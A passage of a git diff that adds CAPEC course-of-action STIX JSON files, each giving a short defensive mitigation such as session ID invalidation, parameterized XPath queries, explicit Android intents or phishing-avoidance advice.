b/capec/course-of-action/course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d.json new file mode 100644 index 0000000000..8f8a304069 --- /dev/null +++ b/capec/course-of-action/course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7b796202-b8fb-42ce-9ab8-53b4e90cfdff", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9238edb8-e9ca-4670-8952-b3cce2207b6d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-581-0", + "description": "Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--925956b6-2678-4433-9afe-3074a2ec9305.json b/capec/course-of-action/course-of-action--925956b6-2678-4433-9afe-3074a2ec9305.json new file mode 100644 index 0000000000..218f13bd32 --- /dev/null +++ b/capec/course-of-action/course-of-action--925956b6-2678-4433-9afe-3074a2ec9305.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2a4ac8ac-7fd5-4dc2-bd74-0db2ba0757c8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--925956b6-2678-4433-9afe-3074a2ec9305", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-163-0", + "description": "Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828.json b/capec/course-of-action/course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828.json new file mode 100644 index 0000000000..33f2fe1f88 --- /dev/null +++ b/capec/course-of-action/course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--29a3d97d-a9e2-4031-b4ae-c9f3278b3990", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-9", + "description": "Implementation: Use indirect references rather than actual file names.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7.json b/capec/course-of-action/course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7.json new file mode 100644 index 0000000000..3e9416a721 --- /dev/null +++ b/capec/course-of-action/course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c914fa98-baf2-4e97-8522-07262435eb9d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--92b05087-a78f-4928-8c5c-cc61442394b7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-0", + "description": "Always invalidate a session ID after the user logout.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7.json b/capec/course-of-action/course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7.json new file mode 100644 index 0000000000..cf2048f014 --- /dev/null +++ b/capec/course-of-action/course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d09dea37-f59f-4e6b-b367-475df0634929", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--931ea671-4821-49f8-a9d3-4d9b79162aa7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-546-0", + "description": "Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429.json b/capec/course-of-action/course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429.json new file mode 100644 index 0000000000..e95e479f11 --- /dev/null +++ b/capec/course-of-action/course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b94d8e91-ee58-46a7-9305-6b28bfb0e52c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--93cf69c5-a053-4064-a4fd-b12d66215429", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-501-0", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An 'explicit intent' is delivered to a specific application as declared within the intent, whereas an 'implicit intent' is directed to an application as defined by the Android operating system. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly (i.e., with appropriate security controls).", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84.json b/capec/course-of-action/course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84.json new file mode 100644 index 0000000000..18d0430363 --- /dev/null +++ b/capec/course-of-action/course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a94a8432-e2e0-4a33-bd08-0db233bbafaf", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9423d36c-3194-482d-8936-135cb8ec2a84", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-500-0", + "description": "The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261.json b/capec/course-of-action/course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261.json new file mode 100644 index 0000000000..b619380b12 --- /dev/null +++ b/capec/course-of-action/course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--059f3a75-2f08-4b0c-b47d-1ef34a3c8e36", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-4", + "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b.json b/capec/course-of-action/course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b.json new file mode 100644 index 0000000000..8f6482017c --- /dev/null +++ b/capec/course-of-action/course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e5b14135-7d45-4147-89f5-6b36f674007e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-501-1", + "description": "Never use implicit intents for inter-application communication.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f.json b/capec/course-of-action/course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f.json new file mode 100644 index 0000000000..26a66fbab1 --- /dev/null +++ b/capec/course-of-action/course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--cae74324-e8b0-4c23-82af-52648939f707", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-146-1", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555.json b/capec/course-of-action/course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555.json new file mode 100644 index 0000000000..092cb6bba9 --- /dev/null +++ b/capec/course-of-action/course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d1342419-30cb-40e7-86b4-4158ee978185", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-236-1", + "description": "Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--95e7a500-58db-4a4b-8516-24b61e683322.json b/capec/course-of-action/course-of-action--95e7a500-58db-4a4b-8516-24b61e683322.json new file mode 100644 index 0000000000..3b9e8b1435 --- /dev/null +++ b/capec/course-of-action/course-of-action--95e7a500-58db-4a4b-8516-24b61e683322.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d24822dd-0fb7-4ccc-b9c8-7ee92b13ba76", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--95e7a500-58db-4a4b-8516-24b61e683322", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-61-1", + "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--95f18f82-c186-43df-937f-09ecf87853d6.json b/capec/course-of-action/course-of-action--95f18f82-c186-43df-937f-09ecf87853d6.json new file mode 100644 index 0000000000..e654f2c700 --- /dev/null +++ b/capec/course-of-action/course-of-action--95f18f82-c186-43df-937f-09ecf87853d6.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f26ab147-7d80-41d3-a3bd-b9c51e611f1e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-78-4", + "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. Do not allow users to access directories/files that they should not access.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--96c87468-200e-4be4-a794-c97c7366f580.json b/capec/course-of-action/course-of-action--96c87468-200e-4be4-a794-c97c7366f580.json new file mode 100644 index 0000000000..53a792a4c1 --- /dev/null +++ b/capec/course-of-action/course-of-action--96c87468-200e-4be4-a794-c97c7366f580.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f71efebd-3ddf-4003-9ea9-a406cf22aaac", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--96c87468-200e-4be4-a794-c97c7366f580", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-111-2", + "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc.json b/capec/course-of-action/course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc.json new file mode 100644 index 0000000000..82d9b07e78 --- /dev/null +++ b/capec/course-of-action/course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--60ffddab-8d19-4c99-b0c3-1e8e5e2ad018", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--96c9c32d-5858-486a-8cca-dadc3bca4adc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-222-1", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d.json b/capec/course-of-action/course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d.json new file mode 100644 index 0000000000..353acfe0e4 --- /dev/null +++ b/capec/course-of-action/course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e16f7fa3-0ac9-460b-9491-636b44a4c75a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--97f10aab-e938-46e9-96e2-f01a26f78c4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-27-2", + "description": "Follow the principle of least privilege when assigning access rights to files.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b.json b/capec/course-of-action/course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b.json new file mode 100644 index 0000000000..72f2d5da82 --- /dev/null +++ b/capec/course-of-action/course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d16ac921-7d07-48a9-bb55-fe18ddb73c0b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--986bd250-42c2-4f6f-8368-c2ab7695a94b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-57-1", + "description": "Design: Utilize defense in depth, do not rely on a single security mechanism like SSL", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01.json b/capec/course-of-action/course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01.json new file mode 100644 index 0000000000..b7234ea0f9 --- /dev/null +++ b/capec/course-of-action/course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7837ed3d-47b1-4ded-bd6f-2370deece59a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-0", + "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d.json b/capec/course-of-action/course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d.json new file mode 100644 index 0000000000..d239ceef73 --- /dev/null +++ b/capec/course-of-action/course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d21b156e-4a4b-4893-a661-a1dba3f1bf4d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9ac957d2-7012-4e03-af73-93bc0a24973d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-178-1", + "description": "Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a.json b/capec/course-of-action/course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a.json new file mode 100644 index 0000000000..76864bb7e5 --- /dev/null +++ b/capec/course-of-action/course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--06c6f8d8-2f8c-428f-a3c4-a2bb85742da6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-83-1", + "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73.json b/capec/course-of-action/course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73.json new file mode 100644 index 0000000000..b866a7b14f --- /dev/null +++ b/capec/course-of-action/course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e2e06e1e-30f1-422c-ae1d-84fa74444779", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-605-0", + "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc.json b/capec/course-of-action/course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc.json new file mode 100644 index 0000000000..4b9d6531f5 --- /dev/null +++ b/capec/course-of-action/course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--68462598-ed50-43d7-9e13-bc227b9718c0", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9c36c07f-9f02-497b-a549-8418278d8cfc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-79-2", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283.json b/capec/course-of-action/course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283.json new file mode 100644 index 0000000000..231e4c489c --- /dev/null +++ b/capec/course-of-action/course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--072255f2-5823-48aa-a632-8dc732825c44", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9cb81a1b-569e-4088-93ff-5eedab574283", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-228-0", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d.json b/capec/course-of-action/course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d.json new file mode 100644 index 0000000000..6b52837571 --- /dev/null +++ b/capec/course-of-action/course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9b0b64e4-089c-4d67-827a-4f3f5d0648fe", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-383-0", + "description": "Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e.json b/capec/course-of-action/course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e.json new file mode 100644 index 0000000000..44a428c43e --- /dev/null +++ b/capec/course-of-action/course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--887c5ad0-29dd-4a24-8e45-b7d3914be41a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-4-1", + "description": "Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1.json b/capec/course-of-action/course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1.json new file mode 100644 index 0000000000..20c5321b62 --- /dev/null +++ b/capec/course-of-action/course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--058fdd32-c4b6-4eb5-a923-bd32ca13059e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9d86866b-c648-423e-a9ff-20a649ccddc1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-574-0", + "description": "Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b.json b/capec/course-of-action/course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b.json new file mode 100644 index 0000000000..9f7d91a42c --- /dev/null +++ b/capec/course-of-action/course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--24733e35-7eb7-4318-8e82-532cbae15a84", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "coa-21-4", + "description": "Design: Use strong session identifiers that are protected in transit and at rest.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08.json b/capec/course-of-action/course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08.json new file mode 100644 index 0000000000..0ea3602d7b --- /dev/null +++ b/capec/course-of-action/course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2f3da659-47ae-4de3-abcc-edf5910b6b3e", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9de6ec93-36de-425d-8666-768d8c83cb08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-546-1", + "description": "Deletion of data should be completed promptly when requested.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a.json b/capec/course-of-action/course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a.json new file mode 100644 index 0000000000..2200729e17 --- /dev/null +++ b/capec/course-of-action/course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--11f887f7-b9b2-41bd-a2a6-93b7509da2b9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9e10d99c-ac01-427e-aee4-2df1aa87286a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-32-7", + "description": "Implementation: Session tokens for specific host", + "object_marking_refs": [ + 